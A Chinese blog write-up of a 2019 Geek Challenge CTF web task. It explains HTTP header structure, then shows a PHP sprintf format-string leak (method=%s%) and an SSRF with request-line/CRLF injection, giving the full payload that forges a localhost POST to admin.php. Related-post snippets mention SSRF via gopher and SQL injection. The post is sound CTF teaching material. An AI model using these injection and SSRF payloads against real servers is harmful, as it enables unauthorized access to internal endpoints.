极客大挑战2019的"服务端检测系统"

最新推荐文章于 2024-02-15 22:18:56 发布
最新推荐文章于 2024-02-15 22:18:56 发布
阅读量763 收藏
点赞数
分类专栏: ctf_web 知识点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/silence1_/article/details/103107902
版权

极客大挑战的"服务端检测系统"

这道题没做出来,看来writeup之后发现是因为自己基础知识不足。这里补一下。

关于HTTP头的一些小知识

http头的格式:
请求方法 /路径 HTTP/版本
头字段: 值

比如:
	GET /index.php HTTP/1.1
	Host: 127.0.0.1

http头部的各个字段之间用CRLF(\r\n)(%0d%0a)分割
http请求头(响应头)和请求体(响应体)之间用两个CRLF分割

最简单的Http请求

get请求:

GET / HTTP/1.1
Host: xx

post请求

POST / HTTP/1.1
Host: xxx
Content-Type: application/x-www-from-urlencoded
Content-Length: 3

a=1
http头的字段(一小部分)
Host

用于多个域名映射到同一个ip时,按照Host的内容匹配不同网站内容,每个Http头必须有Host头
当这个目的主机上只有一个网站,那么Host字段内容可以为任意值

Content-Type

表明内容部分的编码格式和媒体类型 post/put等方式必须有(如果有请求体)

请求头中的Content-Type
GET请求:
GET没有请求实体部分,所以请求头中不需要设置Content-Type字段
POST/PUT请求
如果post/put请求有请求体(有传值),那么必须要设置Content-Type字段(否则服务端可能无法处理你的请求)

  • 第一类:raw原始类型,可以上传任意格式的文本,比如text、json、xml、html…(中文不进行编码)
    text请求:Content-Type: text/plain
    json请求:Content-Type: application/json
    html请求:Content-Type: text/html
  • 第二类:application/x-www-from-urlencoded,会将表单内的数据转换拼接成key-value对(对非ascii码进行编码)
    Content-Type: application/x-www-from-urlencoded
  • 第三类:multipart/from-data,将表单的数据处理为一条消息,以标签为单元,用分隔符分开。既可以上传键值对,也可以上传文件。
    Content-Type: multipart/from-data;boundary=xxx
    在请求体中会有一个Content-Disposition字段,用于描述提交的表单的具体信息
    在这里插入图片描述
    响应头中的Content-Type
    用来告诉客户端,服务端返回的真实内容类型是什么。浏览器或客户端会根据这个值来做一些操作。
Content-Length 表示内容部分的长度 post/put等方式必须有(如果有请求体)


了解了上面的东西再来看这道题

题目给了源码,可控的变量是url和method,提示了admin.php,但要本地才能访问。

<!-- /admin.php -->

<!--
    if(isset($_POST['method']) && isset($_POST['url']) ){
        $method=$_POST['method'];
        $url=$_POST['url'];

        if(preg_match('/^http:\/\//i',$url)){
            $opts = array(
                'http'=>array(
                    'method'=>$method,
                    'timeout'=>3
                )
            );

            $context = stream_context_create($opts);
            $body = @file_get_contents($url."/anything", false, $context);

            if(isset($http_response_header)){
                preg_match("/Allow:(.*?);/i",implode(';',$http_response_header).";",$matches);
                if(isset($matches[1])){
                    echo "服务端支持的请求方法有:".$matches[1];
                }else{
                    echo "failed<br>";
                    echo sprintf("body length of $method%d", $body);
                }
                
            }else{
                echo "error";
            }
        }else{
            echo 'not allowed';
        }

    }
-->

注意到这里将method放在了%d的前面,如果method为%s%,name结尾的%就会将%d中的%给转移掉,而前面的%s就可以将body中的内容给打印出来。
而method又会作为http请求的方式,但不影响,因为某些中间件会将不认识的方式默认当做GET请求来响应

echo "failed<br>";
echo sprintf("body length of $method%d", $body);

提交method=%s%,得到:在这里插入图片描述
代码为:

 <?php
    include("flag.php");
    if($_SERVER['REMOTE_ADDR']=="127.0.0.1"){
        show_source(__FILE__);
        if(@$_POST["iwantflag"]=="yes"){
            echo $flag;
        }
    }else{
        echo "only 127.0.0.1 can visit it";
    }

这里要post一个iwantflag=yes才能获得flag

再看看下面这串代码

 $opts = array(
      'http'=>array(
          'method'=>$method,
          'timeout'=>3
      )
  );

  $context = stream_context_create($opts);
  $body = @file_get_contents($url."/anything", false, $context);

这里使用的stream_context_create和file_get_contents来模拟http请求,method是直接拼接的我们的输入,所以这里我们可以构造一个任意的http请求。

举个列子:
这里服务器的代码为

<?php
$method=$_POST['method'];
$arr = array(
    'http'=>array(
        'method' => $method,
        'header' => "Accept-langule: en"
    )
);
$context=stream_context_create($arr);
$body = file_get_contents("http://127.0.0.1:8808",false,$context);
var_dump($body);
?>

我们用nc来监听本机的8808端口,看看file_get_contents发送的http头数据

nc -lp 8808

如果method为正常的GET,这时候就是正常的一个http请求
在这里插入图片描述
而也很容易想到,我们可以通过method来进行注入,使http头变成我们想要的样子,比如我输入

method=POST / HTTP/1.1
Host: 123
Content-Type: application/x-www-from-urlencoded
Content-Length: 3

a=1
a

这时发出的http请求就会变成
在这里插入图片描述
可以看到,前面的包已经完全成为我们可控的了。

到这里已经很明白了,只要通过method构造我们的http请求头即可

最后payload:

url=http://127.0.0.1&method=POST /admin.php HTTP/1.1
Host: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

iwantflag=yes%26id=%s%

最后加一个参数是为了防止后面的东西影响到前面的iwantflag参数
%26是&的url编码格式,防止在提前被认为是参数分隔符。

最后,得到flag
在这里插入图片描述

Dar1in9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
SSRF【CTFHUB】
D.MIND 的博客
05-14 595
file协议: 在有回显的情况下,利用 file 协议可以读取任意文件的内容 http/s协议:探测内网主机存活 dict协议:泄露安装软件版本信息,查看端口,操作内网redis服务等 gopher协议:gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell 内网访问 http://127.0.0.1/flag.php http://0.0.0.0/fl.
Buuctf之web(五)
qq_50589021的博客
12-14 6431
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
[极客挑战 2019]RCE ME1 ~~不会编程的崽
最新发布
不会编程的崽的博客
02-15 585
rce 取反绕过
安洵杯2022 Web Writeup
渗透测试研究中心
12-01 840
babyphp index.php: <?php //something in flag.php class A { public $a; public $b; public function __wakeup() { $this->a = "babyhacker"; } public function __invo...
[极客挑战 2019]Http
qq_63548648的博客
11-28 1701
1
2018巅峰极客第一场Web题两道
柠檬木有枝
10-21 893
A Simple CMS 一个16 年已经停更,基于 thinkphp 开发的 cms 网站目录大致如下,www.zip 是提供的源码文件 搜索 onethink 漏洞 相关文章,会发现这篇 http://www.hackdig.com/06/hack-36510.htm (thinkphp框架写的开源系统或被getshell tp官方onethink举例),漏洞大致原因是因为写入缓存文件时...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
仿极客学院在线教学视频点播系统
01-26
仿极客学院在线教学视频点播系统,仅供学习参考
极客标记:极客标记-极客标记系统
02-03
极客标记-极客标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
刷题(第二周)
qq_62046696的博客
03-06 503
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
[极客挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
BUUCTF 之 [极客挑战 2019] Havefun(GET 传参)
两个月亮
12-29 2237
网站首页没有按钮,提示信息等等。遇到这种情况往往需要查看网页源代码或进行网站后台扫描。我们先来查看一下网页源代码(右键后点击。在地址栏中输入构造后的链接,敲击。启动靶机后,映入眼帘的是一只猫。这是一段 PHP 代码。即可获得 flag。
[极客挑战 2019]LoveSQL
qq_53689523的博客
02-19 565
更改为limit 1,1(从数据库中下标为1(从0开始标号)开始,取一条数据返回)是没有返回消息,说明就geekuser表中就一条数据。爆出来了密码,以为是flag,但是输入以后不对,但是存在注入点我们是检测出来了,接下来就是获取数据库信息。暴出id,username,password三个字段。暴出id,username,password三个字段。所以,我们采用brup,穷举出表内所有数据。最终,在下标为15的数据处,发现了flag。所以,返回的列为3列,且显示2,3列信息。
[极客挑战 2019]Http(啰嗦版wp)
evil_ming的博客
04-15 2317
虽然很啰嗦,但是可能真的很好懂。 我是真的c 之前遇到用burp的题全都跳过了,觉得好嗨麻烦,配置一堆东西我是真的难受。 但是好像发现要写的题都要用到burp了,就历经千辛万苦去get到手。 好不容易才把这个小框框变成粉色quq(前前后后用了快两三个小时ToT) 首先打开靶机 没什么有用的东西的样子,网页做的还挺好看,那咱就右键然后查看源代码,一直下拉到最下都没啥发现,结果发现还能右拉,发现Secret.php这个东西,那我dna可就动了啊! 输入打开新世界 这个大概意思是这个页
极客挑战2019】love sql详解
kindyyy的博客
04-16 1394
这道题其实是最基本的sql注入类型,所以只要掌握最基础的注入知识很容易就可以得到flag 先打开题目,先用万能密码登陆一下 只是一个乱码啊,没什么用,就直接用sql注入了,先查询列数: 1' order by 3 # 有回显,那再尝试一下4? ' order by 4 # 那就只有3列,查询库名吧,直接上 ...
[极客挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 4609
[极客挑战 2019]LoveSQL 1(SQL注入)
极客挑战2019】LoveSQL解题
Bird&Bird
10-25 1857
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019】LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值